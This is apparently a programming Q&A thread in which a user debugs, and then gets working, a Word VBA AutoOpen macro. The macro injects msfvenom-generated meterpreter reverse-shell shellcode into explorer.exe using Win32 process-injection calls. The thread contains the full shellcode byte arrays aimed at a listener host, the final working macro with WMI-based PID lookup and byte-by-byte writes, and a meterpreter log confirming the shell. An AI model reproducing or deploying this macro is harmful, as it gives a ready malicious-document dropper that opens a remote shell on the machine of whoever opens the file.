Process Injection via VBA Macro Failing
I've been tasked with creating a macro that performs process injection within a Word macro. The steps are quite simple and can be replicated to execute shellcode that I've written it in C. However, I seem to struggle performing the same technique on VBA.
I've declared imports of the OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, and additionally GetLastError for error checking at the top of my VBA code.
Declare PtrSafe Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPtr
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As LongPtr, ByRef lpNumberOfBytesWritten As LongPtr) As LongPtr
Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" (ByVal hProcess As LongPtr, ByRef lpThreadAttributes As Any, ByVal dwStackSize As LongPtr, ByVal lpStartAddress As LongPtr, ByVal lpParameter As LongPtr, ByVal dwCreationFlags As Long, ByRef lpThreadId As LongPtr) As LongPtr
Declare PtrSafe Function GetLastError Lib "Kernel32.dll" () As Long

I've also defined a subroutine AutoOpen, and inside of it defined and declared my variables and function calls.
Dim buf As Variant
    
    ' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=80 -f vba
    buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 81, 86, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 15, 183, 74, 74, 72, 139, 114, 80, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 139, 72, 24, 73, 1, 208, 80, 227, 86, 77, 49, 201, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 65, 88, 65, 88, 72, 1, 208, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 0, 80, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
    
    Dim hProcess As LongPtr
    Dim lpAddress As LongPtr
    Dim bytesWritten As LongPtr
    Dim wMem As LongPtr
    Dim rThread As LongPtr
    Dim lpThreadId As LongPtr
    
    ' Open explorer.exe process with PROCESS_ALL_ACCESS rights
    hProcess = OpenProcess(&H1F0FFF, 0, 2192)
    Debug.Print "OpenProcess: "; GetLastError
    
    ' Allocate memory block for storing shellcode
    lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) - LBound(buf) + 2, &H3000, &H40)
    Debug.Print "VirtualAllocEx: "; GetLastError
    
    ' Write entire buffer array into newly allocated memory block
    wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
    Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
    Debug.Print "WriteProcessMemory: "; GetLastError
    
    ' TEST: Writing single byte of shellcode to memory block one at a time. Get 998 error code
    'Dim counter As Long
    'Dim data As Long
    
    'For offset = LBound(buf) To UBound(buf)
    '    data = buf(offset)
    '    wMem = WriteProcessMemory(hProcess, lpAddress + offset, data, 1, bytesWritten)
    '    Debug.Print "Byte: "; data; " Status: "; wMem; " Bytes Written: "; bytesWritten
    'Next offset
    
    ' Create remote thread for shellcode execution
    rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, lpThreadId)
    Debug.Print "CreateRemoteThread: "; GetLastError
    Debug.Print "Thread ID: "; lpThreadId

When printing debug output after running my macro, I get the following in the debug console:
OpenProcess:  0 
VirtualAllocEx:  0 
Status:  1 Bytes Written:  510 
WriteProcessMemory:  0 
CreateRemoteThread:  0 
Thread ID:  8692 

All seems to be OK. However, when it executes and performs process injection, the explorer.exe process seems to crash, a new one gets spawned and I have to try again.
I'm really clueless as to what's happened here. I managed to get it working last night but lost all code due to Word crashing...
Could it be the way I'm declaring my Win32 function imports? Is it a variable that I'm passing incorrectly?

"I managed to get it working last night but lost all code due to Word crashing..." - This reminds me of Mickens' The Night Watch: "I HAVE NO TOOLS BECAUSE I’VE
DESTROYED MY TOOLS WITH MY TOOLS." The irony is hilarious.

Do you try the code as it is, or have other functions returning some parameters? Using GetLastError after hProcess = OpenProcess(&H1F0FFF, 0, 2192) looks useless. It cannot catch any error even if hProcess is zero. Then, the last parameter (2192) must be the process ID. It must be determined and used the existing one, then simple check Debug.Print hProcess. If it is zero all the following code is useless... All API functions return a specific LongPtr, which must be checked after each call and understand why it is zero, if this is the case...

hProcess does not return 0, it returns a random integer value, which in my case is 4240. Same applies to lpAddress, it returns a memory address as an integer - 44892160. wMem returns 1, which indicates a successful write, and rThread seems to return a thread ID.

Does it mean that 2192 has been manually taken by you from Task Manager? Otherwise, how such a long number to (always) match explorer.exe process ID? It must be different after each explorer start/restart... If manually placed, I can live with that. What the buffer does represent? Theoretically, you cannot inject everything... Then, how do you intend to extract the injection, to use it?

2192 was take from Task Manager, yes. I was working on dynamically extracting the process ID with IBackgroundCopyManager, to which I crashed my word document. The buffer contains shellcode to execute within the process and essentially establish a reverse shell back on my listener I have set up on my other machine. Since I have CreateRemoteThread, that should start a remote thread and execute at address lpStartAddress.

Looking in Task Manager - Details, after explorer/Word crushing (I am not sure which of them was directly affected), do you see besides  Explorer.exe having the know yellow icon other explorer.exe process(es) with suspended status?

The process that crashes is explorer.exe. It seems to be an issue with possibly writing to that process. As a regular system user owns the explorer.exe process, it should be possible to allocate memory within that process and write to it. I'm not entirely sure what you mean by your question, however I can say that explorer.exe restarts after attempting to execute the macro and a new instance is created, thus I update the new PID with the one in my macro.

Did you start Task Manager and searched after Explorer exe in its processes Details (the sixth option to the left side, after Users)? If do that can you see only one Explorer.exe process (sort them alphabetically)  having Running Status and some others (as many crushes happened) having Suspended  status?

explorer.exe appears to be in Running state each time it restarts. The only process I have that is in suspended is SearchApp.exe.

This is strange... And does the new explorer.exe have the same PID? If so, even if it behaves as you described, it looks to be injected. Did you try extracting the injection? Anyhow, I tried your code using the correct PID (extract with a VBA function using WMI) but after each crush I can see in Task Manager another suspended Explorer.exe process. None of them having the previous PID, and the running one also with different PID... I am trying to understand if Windows refuses injection or the injection method/buffer is not appropriate...

I think Windows considers this injection as a threat and needs elevated privileges which Word, Excel (I used...) do not have...

I tried running Excel As Administrator, but the code behaves in the same way. I have a new Explorer.exe  with Suspended status... I work in Windows 11, what OS do you use?

@FaneDuru "I think Windows considers this injection as a threat and needs elevated privileges" - What kind of threat do you see here? What's the danger in spying on yourself? Or stealing all your money from yourself?

@IInspectable How Windows to know that it is about you? All viruses initially runs in the user name. And usually creates more communication/control ways... Then, they can better control your computer. Look here, for instance...

@FaneDuru There is no escalation of privilege, no information disclosure, no threat.

I managed to get it working. Instead of writing the entire shellcode at once with WriteProcessMemory, I wrote byte after byte at a time iterating over the shellcode array and incrementing the address allocated by VirtualAllocEx one byte at a time.
So, instead of writing the entire buffer array like this:
' Write entire buffer array into newly allocated memory block
wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) - LBound(buf) + 1, bytesWritten)
Debug.Print "Status: "; wMem; "Bytes Written: "; bytesWritten
Debug.Print "WriteProcessMemory: "; GetLastError

I wrote it like this:
Dim counter As Long
Dim data As Long
    
For counter = LBound(buf) To UBound(buf)
    data = buf(counter)
    wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
Next counter

Additionally, I made some changes in the way I calculate the size of the array. Instead I calculated the entire array size with UBound(buf) - LBound(buf) + 2, however I read that that is mostly used for two-dimensional arrays. I instead calculated it with UBound(buf) + 1.
The entire updated macro with dynamically finding the explorer.exe PID is as follows:
Declare PtrSafe Function OpenProcess Lib "Kernel32.dll" ( _
    ByVal dwDesiredAccess As Long, _
    ByVal bInheritHandle As Long, _
    ByVal dwProcessId As Long _
    ) As LongPtr
    
Declare PtrSafe Function VirtualAllocEx Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpAddress As LongPtr, _
    ByVal dwSize As LongPtr, _
    ByVal flAllocationType As Long, _
    ByVal flProtect As Long _
    ) As LongPtr
    
Declare PtrSafe Function WriteProcessMemory Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByVal lpBaseAddress As LongPtr, _
    ByRef lpBuffer As Any, _
    ByVal nSize As LongPtr, _
    ByRef lpNumberOfBytesWritten As LongPtr _
    ) As LongPtr

Declare PtrSafe Function CreateRemoteThread Lib "Kernel32.dll" ( _
    ByVal hProcess As LongPtr, _
    ByRef lpThreadAttributes As Any, _
    ByVal dwStackSize As LongPtr, _
    ByVal lpStartAddress As LongPtr, _
    ByVal lpParameter As LongPtr, _
    ByVal dwCreationFlags As Long, _
    ByRef lpThreadId As LongPtr _
    ) As LongPtr

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
    ByVal hObject As LongPtr _
    ) As Long

Sub AutoOpen()
    
    ' Get explorer.exe process PID dynamically with WMI
    Dim pid As Long
    strComputer = "."
    
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
    Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Process", , 48)
    For Each objItem In colItems
        If objItem.Name = "explorer.exe" Then
            pid = objItem.processId
            Exit For
        End If
    Next

    Dim buf As Variant
    
    ' msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.132 LPORT=1337 -f vba
    buf = Array(252, 72, 131, 228, 240, 232, 204, 0, 0, 0, 65, 81, 65, 80, 82, 72, 49, 210, 101, 72, 139, 82, 96, 81, 72, 139, 82, 24, 86, 72, 139, 82, 32, 72, 15, 183, 74, 74, 77, 49, 201, 72, 139, 114, 80, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, _
11, 2, 15, 133, 114, 0, 0, 0, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 68, 139, 64, 32, 80, 73, 1, 208, 139, 72, 24, 227, 86, 72, 255, 201, 77, 49, 201, 65, 139, 52, 136, 72, 1, 214, 72, 49, 192, 65, 193, 201, 13, 172, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, _
208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 72, 139, 18, 233, 75, 255, 255, 255, 93, 73, 190, 119, 115, 50, 95, 51, 50, 0, 0, 65, 86, 73, 137, 230, 72, 129, 236, 160, 1, 0, 0, 73, 137, 229, 73, _
188, 2, 0, 5, 57, 192, 168, 68, 132, 65, 84, 73, 137, 228, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 76, 137, 234, 104, 1, 1, 0, 0, 89, 65, 186, 41, 128, 107, 0, 255, 213, 106, 10, 65, 94, 80, 80, 77, 49, 201, 77, 49, 192, 72, 255, 192, 72, 137, 194, 72, 255, 192, 72, 137, 193, 65, 186, 234, 15, 223, 224, 255, 213, 72, 137, 199, 106, 16, 65, _
88, 76, 137, 226, 72, 137, 249, 65, 186, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 73, 255, 206, 117, 229, 232, 147, 0, 0, 0, 72, 131, 236, 16, 72, 137, 226, 77, 49, 201, 106, 4, 65, 88, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 126, 85, 72, 131, 196, 32, 94, 137, 246, 106, 64, 65, 89, 104, 0, 16, 0, 0, 65, 88, 72, 137, 242, _
72, 49, 201, 65, 186, 88, 164, 83, 229, 255, 213, 72, 137, 195, 73, 137, 199, 77, 49, 201, 73, 137, 240, 72, 137, 218, 72, 137, 249, 65, 186, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 40, 88, 65, 87, 89, 104, 0, 64, 0, 0, 65, 88, 106, 0, 90, 65, 186, 11, 47, 15, 48, 255, 213, 87, 89, 65, 186, 117, 110, 77, 97, 255, 213, 73, 255, 206, 233, 60, 255, _
255, 255, 72, 1, 195, 72, 41, 198, 72, 133, 246, 117, 180, 65, 255, 231, 88, 106, 0, 89, 73, 199, 194, 240, 181, 162, 86, 255, 213)
    
    ' Open explorer.exe process with PROCESS_ALL_ACCESS rights
    Dim hProcess As LongPtr
    hProcess = OpenProcess(&H1F0FFF, 0, pid)
    
    ' Allocate memory block for storing shellcode
    Dim lpAddress As LongPtr
    lpAddress = VirtualAllocEx(hProcess, 0, UBound(buf) + 1, &H3000, &H40)
    
    ' Write shellcode into newly allocated memory block one byte at a time
    Dim wMem As LongPtr
    Dim counter As Long
    Dim data As Long
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        wMem = WriteProcessMemory(hProcess, lpAddress + counter, data, 1, 0)
    Next counter
    
    'Create remote thread for shellcode execution
    Dim rThread As LongPtr
    rThread = CreateRemoteThread(hProcess, 0, 0, lpAddress, 0, 0, 0)
    
    ' Close explorer.exe handle opened by OpenProcess
    CloseHandle (hProcess)

End Sub

Back on my meterpreter listener:
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.68.132:1337
[*] Sending stage (201798 bytes) to 192.168.68.136
[*] Meterpreter session 14 opened (192.168.68.132:1337 -> 192.168.68.136:50687) at 2024-04-26 12:00:30 +0100

meterpreter > getpid
Current pid: 2012
meterpreter > ps

<SNIP>

2012   612   explorer.exe                x64   1        DESKTOP-OUDRCEN\sunflower  C:\Windows\explorer.exe

The PID in my meterpreter session matches explorer.exe

Writing to memory one byte at a time makes no sense. I will be genuinely surprised if that has any observable effect (other than being slower).

With my previous statement wMem = WriteProcessMemory(hProcess, lpAddress, buf, UBound(buf) + 1, 0) it seems to crash any process I try to inject to. I can't figure out as to why but it happens. I've seen that various other VBA macros write one byte at a time, for instance this link macro writes one byte at a time also. Maybe its the behaviour of VBA. However you're right. I wouldn't do it like that if I was to write it in a language like C. As it works for now, I will use this technique.
